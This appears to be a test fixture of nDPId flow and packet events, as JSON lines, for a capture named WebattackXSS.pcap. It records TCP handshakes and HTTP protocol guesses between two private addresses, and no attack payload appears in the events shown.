+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347918608,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347918608,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vWVAAD4GCGusEAABwKgKMoUQAFB11zX0AAAAAKACchCkCgAAAgQFtAQCCAoBPIiRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":2,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhRAjuy7Uddc19aAScSD0bgAAAgQFtAQCCAoD5loFATyIkQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":3,"flow_last_seen":1499347918608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vWZAAD4GCHKsEAABwKgKMoUQAFB11zX1I7su1YAQAOWTdgAAAQEICgE8iJED5loF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347921170,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347921170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rYJAAD4GGE6sEAABwKgKMoUqAFCWpCaTAAAAAKACchCQBAAAAgQFtAQCCAoBPIsRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":2,"flow_last_seen":1499347921170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhSrhgaXUlqQmlKAScSCpIAAAAgQFtAQCCAoD5lyGATyLEQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":3,"flow_last_seen":1499347921171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347921171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rYNAAD4GGFWsEAABwKgKMoUqAFCWpCaU4YGl1YAQAOVIJwAAAQEICgE8ixID5lyG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347922471,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347922471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+oRAAD4Gy0usEAABwKgKMoU4AFCzyHbTAAAAAKACchAhTAAAAgQFtAQCCAoBPIxXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7931,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":2,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhTjpB7A2s8h21KAScSAnOwAAAgQFtAQCCAoD5l3LATyMVwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7932,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":3,"flow_last_seen":1499347922472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347922472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+oVAAD4Gy1KsEAABwKgKMoU4AFCzyHbU6QewN4AQAOXGQgAAAQEICgE8jFcD5l3L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347923737,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347923737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ldBAAD4GMACsEAABwKgKMoVGAFBUeRhDAAAAAKACchDd4QAAAgQFtAQCCAoBPI2TAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":2,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhUa68naDVHkYRKAScSBKXQAAAgQFtAQCCAoD5l8HATyNkwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":3,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ldFAAD4GMAesEAABwKgKMoVGAFBUeRhEuvJ2hIAQAOXpZAAAAQEICgE8jZMD5l8H"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347926328,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y4hAAD4GYkisEAABwKgKMoVgAFAOjvOTAAAAAKACchBF2gAAAgQFtAQCCAoBPJAbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhWB82qzsDo7zlKAScSC3fAAAAgQFtAQCCAoD5mGPATyQGwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":3,"flow_last_seen":1499347926329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347926329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y4lAAD4GYk+sEAABwKgKMoVgAFAOjvOUfNqs7YAQAOVWhAAAAQEICgE8kBsD5mGP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347927657,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347927657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NcxAAD4GkASsEAABwKgKMoVuAFCXD6SrAAAAAKACchAK5wAAAgQFtAQCCAoBPJFnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":2,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhW4waOSnlw+krKAScSCP9AAAAgQFtAQCCAoD5mLbATyRZwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":3,"flow_last_seen":1499347927658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347927658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nc1AAD4GkAusEAABwKgKMoVuAFCXD6SsMGjkqIAQAOUu\/AAAAQEICgE8kWcD5mLb"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347930265,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347930265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OHxAAD4GjVSsEAABwKgKMoWIAFCpfquPAAAAAKACchDu7QAAAgQFtAQCCAoBPJPzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":2,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhYivvJwGqX6rkKAScSA6vAAAAgQFtAQCCAoD5mVnATyT8wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":3,"flow_last_seen":1499347930266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347930266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OH1AAD4GjVusEAABwKgKMoWIAFCpfquQr7ycB4AQAOXZwwAAAQEICgE8k\/MD5mVn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347931529,"flow_last_seen":1499347931529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347931529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1499347931529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j75AAD4GNhKsEAABwKgKMoWWAFDyyRqRAAAAAKACchA1VwAAAgQFtAQCCAoBPJUvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":2,"flow_last_seen":1499347931530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931530,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhZYdLW4k8skakqAScSBAWwAAAgQFtAQCCAoD5majATyVLwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":3,"flow_last_seen":1499347931530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347931530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j79AAD4GNhmsEAABwKgKMoWWAFDyyRqSHS1uJYAQAOXfYgAAAQEICgE8lS8D5maj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347934152,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347934152,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DbVAAD4GuBusEAABwKgKMoWwAFC\/7poKAAAAAKACchDmDgAAAgQFtAQCCAoBPJe\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":2,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhbAhVp9vv+6aC6AScSC5DgAAAgQFtAQCCAoD5mkzATyXvwEDAwc="} 